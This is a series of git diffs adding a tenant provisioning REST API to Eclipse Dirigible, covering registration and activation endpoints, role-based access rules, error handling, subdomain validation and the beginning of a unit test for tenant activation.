+        return TenantInitializationState.of(InitializationStatus.COMPLETED);
+    }
+}

--- a/components/core/core-tenants-provisioning/src/main/java/org/eclipse/dirigible/components/tenants/provisioning/external/TenantProvisioningApiEnabledCondition.java
+++ b/components/core/core-tenants-provisioning/src/main/java/org/eclipse/dirigible/components/tenants/provisioning/external/TenantProvisioningApiEnabledCondition.java
@@ -1,0 +1,45 @@
+/*
+ * Copyright (c) 2010-2026 Eclipse Dirigible contributors
+ *
+ * All rights reserved. This program and the accompanying materials are made available under the
+ * terms of the Eclipse Public License v2.0 which accompanies this distribution, and is available at
+ * http://www.eclipse.org/legal/epl-v20.html
+ *
+ * SPDX-FileCopyrightText: Eclipse Dirigible contributors SPDX-License-Identifier: EPL-2.0
+ */
+package org.eclipse.dirigible.components.tenants.provisioning.external;
+
+import org.eclipse.dirigible.commons.config.DirigibleConfig;
+import org.springframework.context.annotation.Condition;
+import org.springframework.context.annotation.ConditionContext;
+import org.springframework.core.type.AnnotatedTypeMetadata;
+
+/**
+ * Matches when the deployment opted into the tenant provisioning API with
+ * {@link DirigibleConfig#TENANT_PROVISIONING_API_ENABLED}.
+ *
+ * <p>
+ * Every bean of this component carries it, so a deployment that did not opt in has no endpoint, no
+ * service and no security rule from here at all - the API is absent rather than merely refusing.
+ * That is the isolation this feature rests on: it accepts real database credentials.
+ *
+ * <p>
+ * The decision is read from Dirigible's own configuration rather than through
+ * {@code @ConditionalOnProperty}: Dirigible resolves a key across its own layers (runtime, tenant,
+ * environment, deployment, module) and a value placed there programmatically - which is how the
+ * integration tests switch the API on - never reaches the Spring {@code Environment}.
+ */
+public class TenantProvisioningApiEnabledCondition implements Condition {
+
+    /**
+     * Matches.
+     *
+     * @param context the context
+     * @param metadata the metadata
+     * @return true, if the tenant provisioning API is enabled
+     */
+    @Override
+    public boolean matches(ConditionContext context, AnnotatedTypeMetadata metadata) {
+        return DirigibleConfig.TENANT_PROVISIONING_API_ENABLED.getBooleanValue();
+    }
+}

--- a/components/core/core-tenants-provisioning/src/main/java/org/eclipse/dirigible/components/tenants/provisioning/external/TenantProvisioningEndpoint.java
+++ b/components/core/core-tenants-provisioning/src/main/java/org/eclipse/dirigible/components/tenants/provisioning/external/TenantProvisioningEndpoint.java
@@ -9,13 +9,17 @@
  */
 package org.eclipse.dirigible.components.tenants.provisioning.external;
 
+import java.net.URI;
+
 import org.eclipse.dirigible.components.base.endpoint.BaseEndpoint;
+import org.eclipse.dirigible.components.tenants.domain.Tenant;
 import org.eclipse.dirigible.components.tenants.provisioning.external.TenantRegistrationService.RegistrationResult;
 import org.springframework.context.annotation.Conditional;
 import org.springframework.http.HttpStatus;
 import org.springframework.http.ResponseEntity;
 import org.springframework.web.bind.annotation.GetMapping;
 import org.springframework.web.bind.annotation.PathVariable;
+import org.springframework.web.bind.annotation.PostMapping;
 import org.springframework.web.bind.annotation.PutMapping;
 import org.springframework.web.bind.annotation.RequestBody;
 import org.springframework.web.bind.annotation.RequestMapping;
@@ -40,13 +44,18 @@ class TenantProvisioningEndpoint extends BaseEndpoint {
     /** The registration service. */
     private final TenantRegistrationService registrationService;
 
+    /** The activation service. */
+    private final TenantActivationService activationService;
+
     /**
      * Instantiates a new tenant provisioning endpoint.
      *
      * @param registrationService the registration service
+     * @param activationService the activation service
      */
-    TenantProvisioningEndpoint(TenantRegistrationService registrationService) {
+    TenantProvisioningEndpoint(TenantRegistrationService registrationService, TenantActivationService activationService) {
         this.registrationService = registrationService;
+        this.activationService = activationService;
     }
 
     /**
@@ -73,5 +82,39 @@ class TenantProvisioningEndpoint extends BaseEndpoint {
     @GetMapping("/{tenantId}")
     ResponseEntity<TenantProvisioningState> getTenant(@PathVariable("tenantId") String tenantId) {
         return ResponseEntity.ok(registrationService.read(tenantId));
+    }
+
+    /**
+     * Activates the tenant and starts materializing its artefacts.
+     *
+     * <p>
+     * Answers before the materialization is done: it is a full synchronization pass, tens of seconds to
+     * minutes, far beyond any sane HTTP timeout. The caller polls the location in the response.
+     * Repeating the call is safe and is how a failed initialization is retried.
+     *
+     * @param tenantId the tenant id
+     * @return 202, pointing at the status to poll
+     */
+    @PostMapping("/{tenantId}/activation")
+    ResponseEntity<TenantInitializationState> activateTenant(@PathVariable("tenantId") String tenantId) {
+        Tenant tenant = registrationService.requireTenant(tenantId);
+        activationService.activate(tenant);
+        return ResponseEntity.accepted()
+                             .location(URI.create(
+                                     "/" + BaseEndpoint.PREFIX_ENDPOINT_TENANT_PROVISIONING + "tenants/" + tenantId + "/activation"))
+                             .body(registrationService.read(tenantId)
+                                                      .initialization());
+    }
+
+    /**
+     * How far the tenant's initialization has got.
+     *
+     * @param tenantId the tenant id
+     * @return the initialization state
+     */
+    @GetMapping("/{tenantId}/activation")
+    ResponseEntity<TenantInitializationState> getActivation(@PathVariable("tenantId") String tenantId) {
+        return ResponseEntity.ok(registrationService.read(tenantId)
+                                                    .initialization());
     }
 }

--- a/components/core/core-tenants-provisioning/src/main/java/org/eclipse/dirigible/components/tenants/provisioning/external/TenantProvisioningEndpoint.java
+++ b/components/core/core-tenants-provisioning/src/main/java/org/eclipse/dirigible/components/tenants/provisioning/external/TenantProvisioningEndpoint.java
@@ -1,0 +1,77 @@
+/*
+ * Copyright (c) 2010-2026 Eclipse Dirigible contributors
+ *
+ * All rights reserved. This program and the accompanying materials are made available under the
+ * terms of the Eclipse Public License v2.0 which accompanies this distribution, and is available at
+ * http://www.eclipse.org/legal/epl-v20.html
+ *
+ * SPDX-FileCopyrightText: Eclipse Dirigible contributors SPDX-License-Identifier: EPL-2.0
+ */
+package org.eclipse.dirigible.components.tenants.provisioning.external;
+
+import org.eclipse.dirigible.components.base.endpoint.BaseEndpoint;
+import org.eclipse.dirigible.components.tenants.provisioning.external.TenantRegistrationService.RegistrationResult;
+import org.springframework.context.annotation.Conditional;
+import org.springframework.http.HttpStatus;
+import org.springframework.http.ResponseEntity;
+import org.springframework.web.bind.annotation.GetMapping;
+import org.springframework.web.bind.annotation.PathVariable;
+import org.springframework.web.bind.annotation.PutMapping;
+import org.springframework.web.bind.annotation.RequestBody;
+import org.springframework.web.bind.annotation.RequestMapping;
+import org.springframework.web.bind.annotation.RestController;
+
+import jakarta.annotation.security.RolesAllowed;
+import jakarta.validation.Valid;
+
+/**
+ * Registers a tenant on behalf of an external provisioner and reads it back.
+ *
+ * <p>
+ * The tenant id is supplied by the caller, not generated: one tenant is the same customer across a
+ * landscape of applications, so the provisioner that owns the landscape owns the id as well.
+ */
+@RestController
+@RequestMapping(BaseEndpoint.PREFIX_ENDPOINT_TENANT_PROVISIONING + "tenants")
+@RolesAllowed({TenantProvisioningRoles.TENANT_PROVISIONER, TenantProvisioningRoles.ADMINISTRATOR, TenantProvisioningRoles.OPERATOR})
+@Conditional(TenantProvisioningApiEnabledCondition.class)
+class TenantProvisioningEndpoint extends BaseEndpoint {
+
+    /** The registration service. */
+    private final TenantRegistrationService registrationService;
+
+    /**
+     * Instantiates a new tenant provisioning endpoint.
+     *
+     * @param registrationService the registration service
+     */
+    TenantProvisioningEndpoint(TenantRegistrationService registrationService) {
+        this.registrationService = registrationService;
+    }
+
+    /**
+     * Registers the tenant, or updates the registration of the one already under that id.
+     *
+     * @param tenantId the tenant id
+     * @param parameter the registration body
+     * @return 201 when the tenant was created, 200 when it already existed
+     */
+    @PutMapping("/{tenantId}")
+    ResponseEntity<TenantProvisioningState> registerTenant(@PathVariable("tenantId") String tenantId,
+            @Valid @RequestBody RegisterTenantParameter parameter) {
+        RegistrationResult result = registrationService.register(tenantId, parameter);
+        return ResponseEntity.status(result.created() ? HttpStatus.CREATED : HttpStatus.OK)
+                             .body(result.state());
+    }
+
+    /**
+     * Reads the tenant and how far its initialization has got.
+     *
+     * @param tenantId the tenant id
+     * @return the tenant state
+     */
+    @GetMapping("/{tenantId}")
+    ResponseEntity<TenantProvisioningState> getTenant(@PathVariable("tenantId") String tenantId) {
+        return ResponseEntity.ok(registrationService.read(tenantId));
+    }
+}

--- a/components/core/core-tenants-provisioning/src/main/java/org/eclipse/dirigible/components/tenants/provisioning/external/TenantProvisioningError.java
+++ b/components/core/core-tenants-provisioning/src/main/java/org/eclipse/dirigible/components/tenants/provisioning/external/TenantProvisioningError.java
@@ -1,0 +1,20 @@
+/*
+ * Copyright (c) 2010-2026 Eclipse Dirigible contributors
+ *
+ * All rights reserved. This program and the accompanying materials are made available under the
+ * terms of the Eclipse Public License v2.0 which accompanies this distribution, and is available at
+ * http://www.eclipse.org/legal/epl-v20.html
+ *
+ * SPDX-FileCopyrightText: Eclipse Dirigible contributors SPDX-License-Identifier: EPL-2.0
+ */
+package org.eclipse.dirigible.components.tenants.provisioning.external;
+
+/**
+ * What a refused call answers with.
+ *
+ * @param status the HTTP status code
+ * @param error the HTTP status name
+ * @param message why the call was refused - the part a caller can act on
+ */
+public record TenantProvisioningError(int status, String error, String message) {
+}

--- a/components/core/core-tenants-provisioning/src/main/java/org/eclipse/dirigible/components/tenants/provisioning/external/TenantProvisioningExceptionHandler.java
+++ b/components/core/core-tenants-provisioning/src/main/java/org/eclipse/dirigible/components/tenants/provisioning/external/TenantProvisioningExceptionHandler.java
@@ -1,0 +1,94 @@
+/*
+ * Copyright (c) 2010-2026 Eclipse Dirigible contributors
+ *
+ * All rights reserved. This program and the accompanying materials are made available under the
+ * terms of the Eclipse Public License v2.0 which accompanies this distribution, and is available at
+ * http://www.eclipse.org/legal/epl-v20.html
+ *
+ * SPDX-FileCopyrightText: Eclipse Dirigible contributors SPDX-License-Identifier: EPL-2.0
+ */
+package org.eclipse.dirigible.components.tenants.provisioning.external;
+
+import java.util.stream.Collectors;
+
+import org.springframework.context.annotation.Conditional;
+import org.springframework.http.HttpStatus;
+import org.springframework.http.HttpStatusCode;
+import org.springframework.http.ResponseEntity;
+import org.springframework.validation.FieldError;
+import org.springframework.web.bind.MethodArgumentNotValidException;
+import org.springframework.web.bind.annotation.ExceptionHandler;
+import org.springframework.web.bind.annotation.RestControllerAdvice;
+import org.springframework.web.server.ResponseStatusException;
+
+/**
+ * Puts the reason a call was refused into the response body.
+ *
+ * <p>
+ * The caller of this API is a program driving a provisioning process, and every refusal it can get
+ * is one it has to act on differently: a password the database rejected, a data source that has to
+ * be registered first, a subdomain another tenant holds. Without the reason it sees "Bad Gateway"
+ * and can only give up, and the operator reading its logs learns nothing either. The platform's
+ * {@code server.error.include-message=always} was meant to cover this and does not reach a
+ * {@code ResponseStatusException} raised here, so the body is written explicitly rather than left
+ * to chance - it is part of what this API promises.
+ *
+ * <p>
+ * Scoped to this component's endpoints: how the rest of the platform renders its errors is not this
+ * feature's business to change.
+ */
+@RestControllerAdvice(assignableTypes = {TenantProvisioningEndpoint.class, TenantDataSourceProvisioningEndpoint.class})
+@Conditional(TenantProvisioningApiEnabledCondition.class)
+class TenantProvisioningExceptionHandler {
+
+    /**
+     * Renders a refusal raised by this component.
+     *
+     * @param ex the exception
+     * @return the status it carries, with its reason in the body
+     */
+    @ExceptionHandler(ResponseStatusException.class)
+    ResponseEntity<TenantProvisioningError> handleResponseStatus(ResponseStatusException ex) {
+        return body(ex.getStatusCode(), ex.getReason());
+    }
+
+    /**
+     * Renders a body that failed validation, naming the fields rather than only their count.
+     *
+     * @param ex the exception
+     * @return 400 with the offending fields
+     */
+    @ExceptionHandler(MethodArgumentNotValidException.class)
+    ResponseEntity<TenantProvisioningError> handleValidation(MethodArgumentNotValidException ex) {
+        String message = ex.getBindingResult()
+                           .getFieldErrors()
+                           .stream()
+                           .map(TenantProvisioningExceptionHandler::describe)
+                           .collect(Collectors.joining("; "));
+        return body(HttpStatus.BAD_REQUEST, message.isEmpty() ? "The request body is not valid" : message);
+    }
+
+    /**
+     * Describe.
+     *
+     * @param error the field error
+     * @return the field and what is wrong with it
+     */
+    private static String describe(FieldError error) {
+        return error.getField() + ": " + error.getDefaultMessage();
+    }
+
+    /**
+     * Body.
+     *
+     * @param status the status
+     * @param message the message
+     * @return the response
+     */
+    private static ResponseEntity<TenantProvisioningError> body(HttpStatusCode status, String message) {
+        HttpStatus resolved = HttpStatus.resolve(status.value());
+        String name = resolved == null ? "Error" : resolved.getReasonPhrase();
+        return ResponseEntity.status(status)
+                             .body(new TenantProvisioningError(status.value(), name, message));
+    }
+}

--- a/components/core/core-tenants-provisioning/src/main/java/org/eclipse/dirigible/components/tenants/provisioning/external/TenantProvisioningRoles.java
+++ b/components/core/core-tenants-provisioning/src/main/java/org/eclipse/dirigible/components/tenants/provisioning/external/TenantProvisioningRoles.java
@@ -1,0 +1,39 @@
+/*
+ * Copyright (c) 2010-2026 Eclipse Dirigible contributors
+ *
+ * All rights reserved. This program and the accompanying materials are made available under the
+ * terms of the Eclipse Public License v2.0 which accompanies this distribution, and is available at
+ * http://www.eclipse.org/legal/epl-v20.html
+ *
+ * SPDX-FileCopyrightText: Eclipse Dirigible contributors SPDX-License-Identifier: EPL-2.0
+ */
+package org.eclipse.dirigible.components.tenants.provisioning.external;
+
+/**
+ * Who may call the tenant provisioning API.
+ *
+ * <p>
+ * {@link #TENANT_PROVISIONER} is deliberately NOT a value of
+ * {@code org.eclipse.dirigible.components.base.http.roles.Roles}: trial mode grants every role of
+ * that enum to every user, and a role that provisions tenants and accepts database credentials must
+ * never be handed out by a convenience switch. It is carried by a machine-to-machine token - a
+ * resource-server scope whose bare name is {@code TENANT_PROVISIONER}, which
+ * {@code ScopeRoleJwtAuthoritiesConverter} maps one to one.
+ *
+ * <p>
+ * {@code ADMINISTRATOR} and {@code OPERATOR} are admitted as well, so an operator can drive the
+ * same sequence by hand when a provisioning run has to be repaired.
+ */
+final class TenantProvisioningRoles {
+
+    /** The role a machine-to-machine provisioning client presents. */
+    static final String TENANT_PROVISIONER = "TENANT_PROVISIONER";
+
+    /** The role of a platform administrator - break-glass access to the same API. */
+    static final String ADMINISTRATOR = "ADMINISTRATOR";
+
+    /** The role of a platform operator - break-glass access to the same API. */
+    static final String OPERATOR = "OPERATOR";
+
+    private TenantProvisioningRoles() {}
+}

--- a/components/core/core-tenants-provisioning/src/main/java/org/eclipse/dirigible/components/tenants/provisioning/external/TenantProvisioningSecurityConfigurator.java
+++ b/components/core/core-tenants-provisioning/src/main/java/org/eclipse/dirigible/components/tenants/provisioning/external/TenantProvisioningSecurityConfigurator.java
@@ -1,0 +1,53 @@
+/*
+ * Copyright (c) 2010-2026 Eclipse Dirigible contributors
+ *
+ * All rights reserved. This program and the accompanying materials are made available under the
+ * terms of the Eclipse Public License v2.0 which accompanies this distribution, and is available at
+ * http://www.eclipse.org/legal/epl-v20.html
+ *
+ * SPDX-FileCopyrightText: Eclipse Dirigible contributors SPDX-License-Identifier: EPL-2.0
+ */
+package org.eclipse.dirigible.components.tenants.provisioning.external;
+
+import org.eclipse.dirigible.components.base.endpoint.BaseEndpoint;
+import org.eclipse.dirigible.components.base.http.access.CustomSecurityConfigurator;
+import org.slf4j.Logger;
+import org.slf4j.LoggerFactory;
+import org.springframework.context.annotation.Conditional;
+import org.springframework.security.config.annotation.web.builders.HttpSecurity;
+import org.springframework.stereotype.Component;
+
+/**
+ * Claims {@code /services/tenant-provisioning/**} for the roles that may provision tenants.
+ *
+ * <p>
+ * Registering the rule here rather than in the platform's URL matrix is what makes it apply to
+ * every security chain a deployment may run - basic authentication, Keycloak, Cognito - from one
+ * bean. Custom configurators are applied before that matrix, and the first matching rule wins, so
+ * this one is authoritative for the prefix.
+ */
+@Component
+@Conditional(TenantProvisioningApiEnabledCondition.class)
+class TenantProvisioningSecurityConfigurator implements CustomSecurityConfigurator {
+
+    /** The Constant LOGGER. */
+    private static final Logger LOGGER = LoggerFactory.getLogger(TenantProvisioningSecurityConfigurator.class);
+
+    /** The Constant PATTERN. */
+    private static final String PATTERN = "/" + BaseEndpoint.PREFIX_ENDPOINT_TENANT_PROVISIONING + "**";
+
+    /**
+     * Configure.
+     *
+     * @param http the http
+     * @throws Exception the exception
+     */
+    @Override
+    public void configure(HttpSecurity http) throws Exception {
+        LOGGER.info("The tenant provisioning API is enabled. Claiming [{}] for roles [{}, {}, {}].", PATTERN,
+                TenantProvisioningRoles.TENANT_PROVISIONER, TenantProvisioningRoles.ADMINISTRATOR, TenantProvisioningRoles.OPERATOR);
+        http.authorizeHttpRequests(authz -> authz.requestMatchers(PATTERN)
+                                                 .hasAnyRole(TenantProvisioningRoles.TENANT_PROVISIONER,
+                                                         TenantProvisioningRoles.ADMINISTRATOR, TenantProvisioningRoles.OPERATOR));
+    }
+}

--- a/components/core/core-tenants-provisioning/src/main/java/org/eclipse/dirigible/components/tenants/provisioning/external/TenantProvisioningState.java
+++ b/components/core/core-tenants-provisioning/src/main/java/org/eclipse/dirigible/components/tenants/provisioning/external/TenantProvisioningState.java
@@ -1,0 +1,26 @@
+/*
+ * Copyright (c) 2010-2026 Eclipse Dirigible contributors
+ *
+ * All rights reserved. This program and the accompanying materials are made available under the
+ * terms of the Eclipse Public License v2.0 which accompanies this distribution, and is available at
+ * http://www.eclipse.org/legal/epl-v20.html
+ *
+ * SPDX-FileCopyrightText: Eclipse Dirigible contributors SPDX-License-Identifier: EPL-2.0
+ */
+package org.eclipse.dirigible.components.tenants.provisioning.external;
+
+import org.eclipse.dirigible.components.tenants.domain.TenantStatus;
+
+/**
+ * A tenant as the provisioning API describes it - the same body a registration answers with and a
+ * read returns, so a caller never has to learn two shapes.
+ *
+ * @param id the tenant id
+ * @param name the tenant name
+ * @param subdomain the tenant subdomain
+ * @param status the platform tenant status
+ * @param initialization how far the tenant's initialization has got
+ */
+public record TenantProvisioningState(String id, String name, String subdomain, TenantStatus status,
+        TenantInitializationState initialization) {
+}

--- a/components/core/core-tenants-provisioning/src/main/java/org/eclipse/dirigible/components/tenants/provisioning/external/TenantRegistrationService.java
+++ b/components/core/core-tenants-provisioning/src/main/java/org/eclipse/dirigible/components/tenants/provisioning/external/TenantRegistrationService.java
@@ -71,6 +71,9 @@ class TenantRegistrationService {
         }
         String subdomain = parameter.getSubdomain() == null || parameter.getSubdomain()
                                                                         .isBlank() ? tenantId : parameter.getSubdomain();
+        if (!TenantIds.isValid(subdomain)) {
+            throw new ResponseStatusException(HttpStatus.BAD_REQUEST, TenantIds.invalidSubdomainMessage(subdomain));
+        }
         rejectSubdomainOfAnotherTenant(tenantId, subdomain);
 
         Optional<Tenant> existing = tenantService.findById(tenantId);

--- a/components/core/core-tenants-provisioning/src/main/java/org/eclipse/dirigible/components/tenants/provisioning/external/TenantRegistrationService.java
+++ b/components/core/core-tenants-provisioning/src/main/java/org/eclipse/dirigible/components/tenants/provisioning/external/TenantRegistrationService.java
@@ -1,0 +1,155 @@
+/*
+ * Copyright (c) 2010-2026 Eclipse Dirigible contributors
+ *
+ * All rights reserved. This program and the accompanying materials are made available under the
+ * terms of the Eclipse Public License v2.0 which accompanies this distribution, and is available at
+ * http://www.eclipse.org/legal/epl-v20.html
+ *
+ * SPDX-FileCopyrightText: Eclipse Dirigible contributors SPDX-License-Identifier: EPL-2.0
+ */
+package org.eclipse.dirigible.components.tenants.provisioning.external;
+
+import java.util.Optional;
+
+import org.eclipse.dirigible.components.tenants.domain.Tenant;
+import org.eclipse.dirigible.components.tenants.domain.TenantStatus;
+import org.eclipse.dirigible.components.tenants.service.TenantService;
+import org.slf4j.Logger;
+import org.slf4j.LoggerFactory;
+import org.springframework.context.annotation.Conditional;
+import org.springframework.http.HttpStatus;
+import org.springframework.stereotype.Service;
+import org.springframework.web.server.ResponseStatusException;
+
+/**
+ * Registers tenants on behalf of an external provisioner, and reads them back.
+ *
+ * <p>
+ * Registration is idempotent because the provisioner that drives it is a retrying process: a step
+ * that timed out may have registered the tenant already, and re-running the whole sequence has to
+ * converge rather than collide. So a registration of a tenant that exists is an update of what the
+ * caller can own - its name and, when supplied, its subdomain - and never a change of its status,
+ * which belongs to the activation.
+ */
+@Service
+@Conditional(TenantProvisioningApiEnabledCondition.class)
+class TenantRegistrationService {
+
+    /** The Constant LOGGER. */
+    private static final Logger LOGGER = LoggerFactory.getLogger(TenantRegistrationService.class);
+
+    /** Marks the tenants this API owns, so an operator can tell them from the ones created by hand. */
+    static final String LOCATION = "TENANT_PROVISIONING_API";
+
+    /** The tenant service. */
+    private final TenantService tenantService;
+
+    /** The initialization status calculator. */
+    private final TenantInitializationStatusCalculator statusCalculator;
+
+    /**
+     * Instantiates a new tenant registration service.
+     *
+     * @param tenantService the tenant service
+     * @param statusCalculator the initialization status calculator
+     */
+    TenantRegistrationService(TenantService tenantService, TenantInitializationStatusCalculator statusCalculator) {
+        this.tenantService = tenantService;
+        this.statusCalculator = statusCalculator;
+    }
+
+    /**
+     * Registers a tenant, or updates the one already registered under that id.
+     *
+     * @param tenantId the caller-supplied tenant id
+     * @param parameter the registration body
+     * @return the resulting state, and whether the tenant was created
+     */
+    RegistrationResult register(String tenantId, RegisterTenantParameter parameter) {
+        if (!TenantIds.isValid(tenantId)) {
+            throw new ResponseStatusException(HttpStatus.BAD_REQUEST, TenantIds.invalidMessage(tenantId));
+        }
+        String subdomain = parameter.getSubdomain() == null || parameter.getSubdomain()
+                                                                        .isBlank() ? tenantId : parameter.getSubdomain();
+        rejectSubdomainOfAnotherTenant(tenantId, subdomain);
+
+        Optional<Tenant> existing = tenantService.findById(tenantId);
+        if (existing.isPresent()) {
+            Tenant tenant = existing.get();
+            LOGGER.info("Tenant [{}] is already registered in status [{}]. Updating its registration.", tenantId, tenant.getStatus());
+            tenant.setName(parameter.getName());
+            if (parameter.getSubdomain() != null && !parameter.getSubdomain()
+                                                              .isBlank()) {
+                tenant.setSubdomain(parameter.getSubdomain());
+            }
+            tenant.updateKey();
+            return new RegistrationResult(toState(tenantService.save(tenant)), false);
+        }
+
+        Tenant tenant = new Tenant(LOCATION, parameter.getName(), "Registered by the tenant provisioning API", subdomain,
+                TenantStatus.PENDING_ACTIVATION);
+        tenant.setId(tenantId);
+        tenant.updateKey();
+        LOGGER.info("Registering tenant [{}] with subdomain [{}] in status [{}].", tenantId, subdomain, TenantStatus.PENDING_ACTIVATION);
+        return new RegistrationResult(toState(tenantService.save(tenant)), true);
+    }
+
+    /**
+     * Reads a tenant.
+     *
+     * @param tenantId the tenant id
+     * @return the state
+     */
+    TenantProvisioningState read(String tenantId) {
+        return toState(requireTenant(tenantId));
+    }
+
+    /**
+     * Finds a tenant or answers 404 - the shared precondition of every operation of this API.
+     *
+     * @param tenantId the tenant id
+     * @return the tenant
+     */
+    Tenant requireTenant(String tenantId) {
+        return tenantService.findById(tenantId)
+                            .orElseThrow(() -> new ResponseStatusException(HttpStatus.NOT_FOUND,
+                                    "There is no tenant with id [" + tenantId + "]"));
+    }
+
+    /**
+     * Projects a tenant onto what the API exposes.
+     *
+     * @param tenant the tenant
+     * @return the state
+     */
+    TenantProvisioningState toState(Tenant tenant) {
+        return new TenantProvisioningState(tenant.getId(), tenant.getName(), tenant.getSubdomain(), tenant.getStatus(),
+                statusCalculator.calculate(tenant));
+    }
+
+    /**
+     * The subdomain column is unique platform-wide, so a collision would surface as a constraint
+     * violation deep in the persistence layer. Answering 409 here says which tenant owns it instead.
+     *
+     * @param tenantId the tenant being registered
+     * @param subdomain the subdomain it asks for
+     */
+    private void rejectSubdomainOfAnotherTenant(String tenantId, String subdomain) {
+        tenantService.findBySubdomain(subdomain)
+                     .filter(owner -> !owner.getId()
+                                            .equals(tenantId))
+                     .ifPresent(owner -> {
+                         throw new ResponseStatusException(HttpStatus.CONFLICT,
+                                 "Subdomain [" + subdomain + "] is already used by tenant [" + owner.getId() + "]");
+                     });
+    }
+
+    /**
+     * The outcome of a registration.
+     *
+     * @param state the resulting tenant state
+     * @param created whether the tenant was created rather than updated
+     */
+    record RegistrationResult(TenantProvisioningState state, boolean created) {
+    }
+}

--- a/components/core/core-tenants-provisioning/src/main/java/org/eclipse/dirigible/components/tenants/provisioning/external/TenantRegistrationService.java
+++ b/components/core/core-tenants-provisioning/src/main/java/org/eclipse/dirigible/components/tenants/provisioning/external/TenantRegistrationService.java
@@ -41,6 +41,22 @@ class TenantRegistrationService {
     /** Marks the tenants this API owns, so an operator can tell them from the ones created by hand. */
     static final String LOCATION = "TENANT_PROVISIONING_API";
 
+    /**
+     * The artefact location of a tenant: the marker above, made unique by the tenant's own id.
+     *
+     * <p>
+     * An artefact's unique key is {@code type:location:name}, so a constant location would make the
+     * <em>display name</em> the unique part - and display names are not unique. Two customers may both
+     * be called "Acme Ltd", and the second registration would fail on the key index. The tenant id is
+     * the identity here (ADR-010, ids are shared across applications), so it belongs in the key.
+     *
+     * @param tenantId the tenant id
+     * @return the location
+     */
+    private static String locationOf(String tenantId) {
+        return LOCATION + "/" + tenantId;
+    }
+
     /** The tenant service. */
     private final TenantService tenantService;
 
@@ -85,11 +101,13 @@ class TenantRegistrationService {
                                                               .isBlank()) {
                 tenant.setSubdomain(parameter.getSubdomain());
             }
+            // also converges a tenant registered before the location carried the id
+            tenant.setLocation(locationOf(tenantId));
             tenant.updateKey();
             return new RegistrationResult(toState(tenantService.save(tenant)), false);
         }
 
-        Tenant tenant = new Tenant(LOCATION, parameter.getName(), "Registered by the tenant provisioning API", subdomain,
+        Tenant tenant = new Tenant(locationOf(tenantId), parameter.getName(), "Registered by the tenant provisioning API", subdomain,
                 TenantStatus.PENDING_ACTIVATION);
         tenant.setId(tenantId);
         tenant.updateKey();

--- a/components/core/core-tenants-provisioning/src/test/java/org/eclipse/dirigible/components/tenants/provisioning/external/TenantActivationServiceTest.java
+++ b/components/core/core-tenants-provisioning/src/test/java/org/eclipse/dirigible/components/tenants/provisioning/external/TenantActivationServiceTest.java
@@ -1,0 +1,239 @@
+/*
+ * Copyright (c) 2010-2026 Eclipse Dirigible contributors
+ *
+ * All rights reserved. This program and the accompanying materials are made available under the
+ * terms of the Eclipse Public License v2.0 which accompanies this distribution, and is available at
+ * http://www.eclipse.org/legal/epl-v20.html
+ *
+ * SPDX-FileCopyrightText: Eclipse Dirigible contributors SPDX-License-Identifier: EPL-2.0
+ */
+package org.eclipse.dirigible.components.tenants.provisioning.external;
+
+import static org.junit.jupiter.api.Assertions.assertEquals;
+import static org.junit.jupiter.api.Assertions.assertThrows;
+import static org.junit.jupiter.api.Assertions.assertTrue;
+import static org.mockito.ArgumentMatchers.any;
+import static org.mockito.ArgumentMatchers.eq;
+import static org.mockito.Mockito.inOrder;
+import static org.mockito.Mockito.mock;
+import static org.mockito.Mockito.never;
+import static org.mockito.Mockito.times;
+import static org.mockito.Mockito.verify;
+import static org.mockito.Mockito.when;
+
+import java.util.ArrayList;
+import java.util.List;
+import java.util.Set;
+import java.util.concurrent.AbstractExecutorService;
+import java.util.concurrent.TimeUnit;
+
+import org.eclipse.dirigible.components.base.synchronizer.MultitenantSynchronizers;
+import org.eclipse.dirigible.components.base.tenant.TenantPostProvisioningStep;
+import org.eclipse.dirigible.components.initializers.definition.DefinitionService;
+import org.eclipse.dirigible.components.tenants.domain.Tenant;
+import org.eclipse.dirigible.components.tenants.domain.TenantStatus;
+import org.eclipse.dirigible.components.tenants.service.TenantService;
+import org.junit.jupiter.api.BeforeEach;
+import org.junit.jupiter.api.Test;
+import org.mockito.InOrder;
+import org.springframework.http.HttpStatus;
+import org.springframework.web.server.ResponseStatusException;
+
+/**
+ * Activation is two things that must happen in one order and one thing that must not happen at all
+ * before the caller is answered.
+ */
+class TenantActivationServiceTest {
+
+    private static final Set<String> MULTITENANT_TYPES = Set.of("table", "csvim");
+
+    private final TenantService tenantService = mock(TenantService.class);
+    private final TenantDataSourceRegistrationService dataSourceRegistrationService = mock(TenantDataSourceRegistrationService.class);
+    private final DefinitionService definitionService = mock(DefinitionService.class);
+    private final MultitenantSynchronizers multitenantSynchronizers = mock(MultitenantSynchronizers.class);
+    private final TenantPostProvisioningStep postProvisioningStep = mock(TenantPostProvisioningStep.class);
+    private final DeferredExecutor executor = new DeferredExecutor();
+
+    private final TenantActivationService service = new TenantActivationService(tenantService, dataSourceRegistrationService,
+            definitionService, multitenantSynchronizers, Set.of(postProvisioningStep), executor);
+
+    @BeforeEach
+    void wireDefaults() {
+        when(multitenantSynchronizers.getArtefactTypes()).thenReturn(MULTITENANT_TYPES);
+        when(dataSourceRegistrationService.isRegistered(any())).thenReturn(true);
+        when(dataSourceRegistrationService.tenantDataSourceName(any())).thenReturn("acme_DefaultDB");
+    }
+
+    @Test
+    void activationMakesTheTenantProvisioned() {
+        Tenant tenant = tenant(TenantStatus.PENDING_ACTIVATION);
+
+        service.activate(tenant);
+
+        assertEquals(TenantStatus.PROVISIONED, tenant.getStatus());
+        verify(tenantService).save(tenant);
+    }
+
+    /**
+     * The per-tenant fan-out only visits provisioned tenants, so a materialization started before the
+     * flip would skip the very tenant it is for.
+     */
+    @Test
+    void theTenantIsProvisionedBeforeAnythingIsMarkedForReprocessing() {
+        service.activate(tenant(TenantStatus.PENDING_ACTIVATION));
+
+        InOrder order = inOrder(tenantService, definitionService);
+        order.verify(tenantService)
+             .save(any());
+        order.verify(definitionService)
+             .updateChecksums(eq(""), eq(MULTITENANT_TYPES));
+    }
+
+    /**
+     * The point of doing the marking in the request thread: a caller that polls the instant it gets its
+     * answer has to see work outstanding, not a status derived from state nothing has touched yet.
+     */
+    @Test
+    void theWorkIsMarkedBeforeTheCallerIsAnswered() {
+        service.activate(tenant(TenantStatus.PENDING_ACTIVATION));
+
+        verify(definitionService).updateChecksums("", MULTITENANT_TYPES);
+        verify(postProvisioningStep, never()).execute();
+    }
+
+    @Test
+    void theInitializationRunsAfterwards() {
+        service.activate(tenant(TenantStatus.PENDING_ACTIVATION));
+
+        executor.runQueued();
+
+        verify(postProvisioningStep).execute();
+    }
+
+    @Test
+    void aTenantWithoutADataSourceCannotBeActivated() {
